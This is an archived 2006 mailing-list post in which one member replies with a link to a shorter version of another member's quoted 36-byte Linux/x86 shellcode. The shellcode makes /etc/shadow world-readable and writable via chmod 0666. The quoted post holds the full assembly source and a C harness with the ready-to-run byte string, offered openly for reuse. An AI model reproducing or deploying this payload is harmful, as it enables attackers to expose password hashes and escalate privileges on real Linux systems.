[Code-Crunchers] 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
Izik
xorninja at gmail.com
Sat Nov 18 09:54:48 CST 2006
Been there, done that.
http://www.tty64.org/code/shellcodes/linux-x86-src/chmod-shadow.s
32 bytes.
On 11/17/06, Kris Katterjohn <kjak at ispwest.com> wrote:
>
> This shellcode does a chmod("/etc/shadow", 0666) and exits in 36 bytes
> on Linux/x86.
>
> Also at http://packetstormsecurity.nl/shellcode/chmodshadow.c
>
> Hey Mike, this is an example from when I didn't use the double-slash and
> did two separate PUSHes (ugly!). An extra byte can be removed from this
> by using the double-slash. I quickly discovered this after it was on PSS
>
> -Kris
>
>
> /* By Kris Katterjohn 8/29/2006
> *
> * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
> *
> * To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
> *
> *
> *
> * section .text
> *
> * global _start
> *
> * _start:
> * xor edx, edx
> *
> * push byte 15
> * pop eax
> * push edx
> * push byte 0x77
> * push word 0x6f64
> * push 0x6168732f
> * push 0x6374652f
> * mov ebx, esp
> * push word 0666Q
> * pop ecx
> * int 0x80
> *
> * push byte 1
> * pop eax
> * int 0x80
> */
>
> main()
> {
> char shellcode[] =
> "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
> "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
> "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
>
> (*(void (*)()) shellcode)();
> }
>
>
>
> _______________________________________________
> Code-Crunchers mailing list
> Code-Crunchers at whitestar.linuxbox.org
> http://whitestar.linuxbox.org/mailman/listinfo/code-crunchers
>
>
>
--
Thank you, your honor. With God's help I'll conquer this terrible
affliction.
-- Mark 'Rentboy' Renton / Trainspotting
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://whitestar.linuxbox.org/pipermail/code-crunchers/attachments/20061118/f114438a/attachment.htm
More information about the Code-Crunchers
mailing list